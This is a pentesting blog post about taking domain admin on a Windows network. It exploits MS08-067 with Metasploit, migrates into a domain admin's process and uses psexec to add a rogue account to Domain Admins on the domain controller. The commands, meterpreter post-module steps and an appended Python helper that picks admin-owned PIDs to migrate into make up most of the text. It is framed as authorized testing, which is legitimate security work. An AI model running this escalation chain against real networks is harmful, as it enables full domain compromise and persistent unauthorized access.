Security, Programming, Pentesting
by averagesecurityguy (stephen@averagesecurityguy.info)
On a recent pentest, one of the goals was to gain domain admin access to the network. If you can get a command prompt on a domain controller (or on any box, under a domain admin's token), two commands give you your own domain admin account:

net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

I found the domain controllers but was unable to identify a suitable vulnerability that would let me access them. However, I found another box on the domain that was vulnerable to MS08-067 (yes, there are still boxes that have not been patched for this vulnerability). Using Metasploit I got a meterpreter shell on this box, then used the ps command to see what processes were running. A few of them were running under the administrator account for the domain. I migrated into one of those processes, so that meterpreter, and anything it spawned, would run with that account's token, and then used the upload command to put psexec on the box. With no destination given, upload writes to the session's current working directory (check it with pwd). Next, I used the shell command to drop into a command prompt and ran

psexec \\nameofdc net user username password /ADD /DOMAIN
psexec \\nameofdc net group "Domain Admins" username /ADD /DOMAIN

psexec authenticates to the domain controller with the token of the process it was launched from, which is why the migration step matters. I now had my own user account with domain admin credentials. Keep in mind that this is a noisy way to do it: the new account and its addition to Domain Admins are logged on the domain controller, so make sure it is within scope and remove the account when you are done.
A few additional notes. On BackTrack, psexec is in the /pentest/windows-binaries/pstools folder. You do not need a process owned by the Administrator account specifically: you can run the net user and net group commands from any process running under any domain admin account. To identify the domain admins you can use the enum_domain_group_users post module. Background your meterpreter session and type

use post/windows/gather/enum_domain_group_users

Then set the group name and the session:

set GROUP "Domain Admins"
set SESSION 1

Run it and you will get a list of domain admin users.

If the shell command fails with

stdapi_sys_process_execute: Operation failed: 1314

(Win32 error 1314 is ERROR_PRIVILEGE_NOT_HELD), do this instead:

execute -f cmd.exe -c -i -H

This is a known issue in meterpreter.
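On a busy server the ps listing runs to hundreds of lines, and picking out the processes owned by any member of Domain Admins by eye is error-prone. The following script, added here as an example and not part of the original post or of Metasploit, cross-references the output of the ps command with the user list printed by enum_domain_group_users and prints the PIDs worth migrating into. It generalises the post slightly: it matches every domain admin, not just the Administrator account. The ps listing and module output below are constructed samples written to resemble Metasploit's table and post-module output, not captures from an engagement; the column layout (fields separated by two or more spaces) and the "[*]     DOMAIN\user" line format are assumptions about that output.

```python
import re
from typing import Dict, List, Set

# Constructed sample of meterpreter "ps" output (made up for this example).
# Metasploit renders tables with at least two spaces between columns, which
# is the only layout property the parser relies on.
SAMPLE_PS = r"""
Process List
============

 PID   PPID  Name              Arch  Session  User                 Path
 ---   ----  ----              ----  -------  ----                 ----
 0     0     [System Process]
 4     0     System            x86   0
 392   4     smss.exe          x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
 1604  1580  explorer.exe      x86   0        CORP\jsmith          C:\Windows\explorer.exe
 2212  1604  cmd.exe           x86   0        CORP\Administrator   C:\Windows\system32\cmd.exe
 2480  1604  notepad.exe       x86   0        corp\backupadm       C:\Windows\system32\notepad.exe
"""

# Constructed sample of what post/windows/gather/enum_domain_group_users prints
# for GROUP "Domain Admins" (assumed format; only the DOMAIN\user tokens matter).
SAMPLE_ADMINS = r"""
[*] Found users in Domain Admins
[*]     CORP\Administrator
[*]     CORP\backupadm
[*]     CORP\svc_sql
"""

# A DOMAIN\user token: no whitespace, exactly one backslash in the middle.
ACCOUNT_RE = re.compile(r"[^\s\\]+\\[^\s\\]+")


def parse_ps(ps_output: str) -> Dict[int, Dict[str, str]]:
    """Turn the text of meterpreter's ps command into {pid: {name, user}}.

    Rows are split on runs of two or more spaces. Kernel rows such as
    "[System Process]" and "System" have no User column; they are kept with
    an empty user so they can never match an admin name.
    """
    procs: Dict[int, Dict[str, str]] = {}
    for line in ps_output.splitlines():
        fields = re.split(r"\s{2,}", line.strip())
        if not fields[0].isdigit():
            continue  # title, header, separator and blank lines
        procs[int(fields[0])] = {
            "name": fields[2] if len(fields) > 2 else "",
            "user": fields[5] if len(fields) > 5 else "",
        }
    return procs


def parse_domain_admins(module_output: str) -> Set[str]:
    """Collect every DOMAIN\\user token from the post module's output.

    Names are lower-cased because Windows account and domain names are
    case-insensitive (ps shows "corp\\backupadm", the module "CORP\\backupadm").
    """
    return {m.group(0).lower() for m in ACCOUNT_RE.finditer(module_output)}


def candidate_pids(ps_output: str, module_output: str) -> List[Dict[str, object]]:
    """Return the processes owned by a Domain Admins member, sorted by PID."""
    admins = parse_domain_admins(module_output)
    hits: List[Dict[str, object]] = []
    for pid, info in sorted(parse_ps(ps_output).items()):
        if info["user"].lower() in admins:
            hits.append({"pid": pid, "name": info["name"], "user": info["user"]})
    return hits


if __name__ == "__main__":
    # In practice paste the real ps and module output into the two strings above.
    for hit in candidate_pids(SAMPLE_PS, SAMPLE_ADMINS):
        print(f"migrate {hit['pid']}    # {hit['name']} running as {hit['user']}")
```

Any PID the script prints is one where the shell or psexec you launch after migrate will carry a domain admin token; prefer a long-lived process such as explorer.exe or a service over something the user may close.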